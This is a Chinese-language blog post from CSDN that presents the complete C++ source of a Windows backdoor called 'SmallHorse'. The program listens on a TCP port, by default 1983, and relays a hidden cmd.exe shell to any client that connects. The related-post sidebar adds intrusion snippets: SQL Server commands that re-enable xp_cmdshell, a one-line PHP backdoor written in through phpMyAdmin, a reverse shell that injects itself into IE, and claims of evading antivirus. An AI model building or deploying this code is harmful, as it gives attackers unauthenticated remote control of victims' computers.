一个简单的CMDShell后门

最新推荐文章于 2021-05-18 01:12:11 发布
最新推荐文章于 2021-05-18 01:12:11 发布
阅读量1.4k 收藏
点赞数
分类专栏: 学习笔记 文章标签: socket null service vc++ security path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/horse_man/article/details/1222582
版权

很久以前写的一段小代码,实现一个简单的CMDShell后门。贴出来再回味一下!注释少了些,见谅!呵呵!
程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。
用法:smallhorse [-p port] -p参数用于设置自己的端口
在vc++6.0 WIN2003下编译通过

#include < winsock2.h >
#include  < stdio.h >
#pragma  comment (lib, "Ws2_32.lib")
int  port = 1983 ;
DWORD WINAPI ClientThread(LPVOID lpParam);
 void  Help()
 {printf("     /***************************************/ ");
printf("     |This SmallHorse's First CMDSHELL V0.1 | ");
printf("     |Thanks For Using It!             | ");
printf("     |SmallHorse [E.S.T] VIP 2005.03     | ");
printf("     |***************************************| ");
printf("     |usage:smallhorse [-p port]         | ");
printf("     |     port: Port Number To Listen On   | ");
printf("     |     Default Port Is 1983         | ");
printf("     /***************************************/ ");
return;
}


void  OpenDoor()
 {
    // 初始化 Winsock.
  WSADATA wsaData;
    SOCKET m_socket,AcceptClient;
    sockaddr_in Service,Client;
    int ClientSize,i=0;
  int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
  if ( iResult != NO_ERROR )
    return;

  // 创建一个 socket.
  
  m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
  if(m_socket==SOCKET_ERROR)
        return;
  Service.sin_family = AF_INET;
  Service.sin_addr.s_addr = htonl(INADDR_ANY);
  Service.sin_port = htons( port );

  if(bind( m_socket, (SOCKADDR*)&Service, sizeof(Service) )==SOCKET_ERROR)
      return;//邦定
  
  if (listen(m_socket,5)==SOCKET_ERROR)
        return;//最大监听列队5个
  printf(" smallhorse Listen On Port: %d... ^*^ ",port);
    ClientSize=sizeof(Client);
    while(1)
    {
    AcceptClient=accept(m_socket,(SOCKADDR*)&Client,&ClientSize);
    if(AcceptClient==SOCKET_ERROR)
        return;//接受连接
    printf( "Client Connected. ");
    char *sendbuf = "/***************************************/ Thanks For Using... SmallHorse's CmdShell! Good Luck! /***************************************/ ";
  send( AcceptClient, sendbuf, strlen(sendbuf), 0 );
    
    if(CreateThread(NULL,0,ClientThread,(LPVOID)&AcceptClient,0,NULL)==NULL)
        printf("Create Thread Error! ");
    Sleep(1000);
    }
    WSACleanup();
    return;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
 {int ret;
char Buf[1024];
HANDLE Rpipe,Wpipe,Wfile,Rfile;
SOCKET AcceptClient=(SOCKET)*(SOCKET*)lpParam;

SECURITY_ATTRIBUTES sa;
sa.nLength=sizeof(sa);
sa.bInheritHandle=TRUE;
sa.lpSecurityDescriptor=NULL;

ret=CreatePipe(&Rpipe,&Rfile,&sa,0);
ret=CreatePipe(&Wfile,&Wpipe,&sa,0); //建立两个管道,分别用于接收命令和显示结果

STARTUPINFO startinfo;
GetStartupInfo(&startinfo);
startinfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput=Wfile;
startinfo.hStdError=startinfo.hStdOutput=Rfile;
startinfo.wShowWindow=SW_HIDE; 

char cmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
    strcat(cmdline,("/cmd.exe"));

PROCESS_INFORMATION proinfo;
ret=CreateProcess(cmdline,NULL,NULL,NULL,1,0,NULL,NULL,&startinfo,&proinfo);
unsigned long ByteRec;
while(1)
{
    Sleep(100);
    PeekNamedPipe(Rpipe,Buf,1024,&ByteRec,0,0);
    if(ByteRec){
        ret=ReadFile(Rpipe,Buf,ByteRec,&ByteRec,0);
        if(!ret)
              break;
        ret=send(AcceptClient,Buf,ByteRec,0);
        if(ret<=0)
              break;
    }
    else{
        ByteRec=recv(AcceptClient,Buf,1024,0);
        if(ByteRec<=0)
              break;
        ret=WriteFile(Wpipe,Buf,ByteRec,&ByteRec,0);
        if(!ret)
              break;
    }
}
return 0;
}
int  main( int  argc,  char   * argv[])
 {   
  Help();
    if(argc==3)
        if(!strcmp(argv[1],"-p"))
              port=atoi(argv[2]);
    OpenDoor();
return 0;
}

 

horse_man
关注
专栏目录
php执行cmd/shell命令 木马小后门
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-03 4366
php执行shell命令,可以使用下面几个函数: string system ( string $command [, int &$return_var ] ) string exec ( string $command [, array &$output [, int &$return_var ]] ) void passthru ( string $command [, int &$return_var ] )  注意的是:这三个函数在默认的情况下,都是被禁止.
(三)phpstudy下开启mysql,运用phpmyadmin管理执行sql语句,写入一句话后门getshell
爱上卿的博客
01-15 3740
学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。 1 启动phpstudy,出现mysql无法启动的问题 因为之前已经装...
cmd后门cmd后门
01-03
放大镜建用户 放大镜建用户 放大镜建用户
一个简单CMDSHELL后门
03-27 1211
一个简单CMDSHELL后门文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)信息来源: 邪恶八进制 中国   最近闲着无聊,自己琢磨着写了个简单CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。  程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来
技术讨论关于零管道CMD后门
冷风
08-08 2828
冷风草草细说下零管道 关注.........μρ2ц清风这个不光过卡巴了,,,基本上所有主动防御都过!!包口SSM,微点,,,夕草hot patching.μρ2ц清风对啊..冷风用socket直接替换输入输出的handle,可以实现零管道sulwan颠覆核心编程啊.μρ2ц清风反正我是用零管道的..幻影    si.hStdInput=hrp1;     si.hStdOutput=hwp2;幻
cmd后门
smwhotjay的专栏
01-14 1027
// door.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include "stdafx.h" #include #pragma comment(lib,"Ws2_32") void door(); int main(int argc, char* argv[]) { door(); return 0; }
服务器后门(cmd使用)
03-24
服务器后门
c++ cmdshell反弹型后门
07-01
反弹型后门 把自身注入到IE中 反向链接服务端 用NC 来监听就可以 大家可以发挥想象 把其他代码补全 (Rebound-type back door to reverse itself into the link into IE to listen with the NC server can imagine we...
xp——cmdshell恢复(古老语言)(内有转载)
Coisini的博客
05-25 469
1 未能找到存储过程’master…xpcmdshell’. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll’declare @o int 第二步执行:sp_adde...
cmdshell源代码
06-03
一个反向连接的cmd shell的源代码,短小精悍
SQL入侵恢复xp_cmdshell方法总结
12-15
1433 SQL入侵恢复xp_cmdshell方法总结 sql server 2005下开启xp_cmdshell的办法 EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE; SQL2005开启’OPENROWSET’支持的方法: exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,1;
兴达快递单打印软件 9.87 专业版-破解版 BY-smallhorse(内存注册机)
04-03
〖兴达快递单打印软件(专业版)〗的主要特点:   1.软件界面友好,可操作性强。   2.软件从企业或店铺的实际出发开发的。   3.快递单可以单张打印或批量打印。   4.可以选择要批量打印的快递单范围。   5.可以设置快递单上打印的字体。   6.收件信息可以导出到Excel表中。   7.支持Excel表导入功能。   8.随时可以数据库备份与恢复。   9.可以隐藏和显示寄件日期。   10.功能稳定,易学,易用。   11.一次注册终身使用。
简单cmd双管道后门
qq_42124567的博客
05-16 1033
这几天学习了一下windows后门编程,并尝试着写了一个简单cmd双管道后门。主要涉及到了socket通信和管道。 后门分为主动连接型和反向连接型,区别就是一个后门程序作为服务端,另一个后门程序作为客户端。 双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
C语言,后门程序,C语言CGI编程二 - 编写cmd后门
weixin_39726044的博客
05-18 530
里面该说的都说的很清楚。今天我们来用它来做一个后门,将后门放在有执行cgi权限的服务器上,通过客户端POST命令到cgi上并执行,达到控制服务器的目的。首先下载官网上的压缩包。解压里面有cgic.c和cgic.h,这是我们需要用到的文件。(另外两个c文件是演示用的,还有一个makefile是linux下使用的,在VS2010中我没有用到它)从官方的文档和下载的cgictest.c可以看到,这个库里...
匿名管道实现基于Socket简单cmd后门
白话机器学习
05-24 1167
原文地址http://hi.baidu.com/yonder88/item/06c6c5c27569810dc610b26f Back.H #ifndef BACKDOOR_H_ #define BACKDOOR_H_ extern HANDLE hReadOne;//Pipe one Read extern HANDLE hWriteOne;//Pipe one Write e
shell cmd
Happy_YYQ的博客
11-02 621
目录windows中cmdshell脚本语言和普通的编程语言有什么区别 windows中cmd 操作系统可以分成核心(kernel)和Shell(外壳)两部分。 在windows系统中见到的桌面即explorer.exe(资源管理器)是图形shell,而cmd就是命令行shellshell Shell管理你与操作系统之间的交互:等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果 近似地认为linux shell=bash而windows=cmd,都是命令行解释器,都是用户与操作系统
xp_cmdshell
kkllmey 的博客
09-26 773
一、简介 xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 二、安全隐患 由于xp_cmdshell 可以执行任何操作系统命令,所以一旦SQL Server管理员帐号(如sa)被攻破,那么攻击者就可以利用xp_cmdshell 在SQL Server中执行操作系统命令,如:创建系统管理员...
C语言实现简单CMDShell
weixin_30532973的博客
06-11 174
1.首先使用vc6编译器编译后门,并运行 #pragma comment(lib,"ws2_32.lib") #ifdef _MSC_VER #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #endif #include <winsock2.h> #i...
Cmd Shell入侵技巧:利用系统工具控制Windows
例如,创建一个名为up.vbs的脚本,利用Microsoft.XMLHTTP对象发送POST请求,将nc.exe文件上传到目标服务器的up.asp页面,并将其重命名为mm.exe。执行命令时,需要指定目标IP、上传文件和保存文件名。 ```vb cscript...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值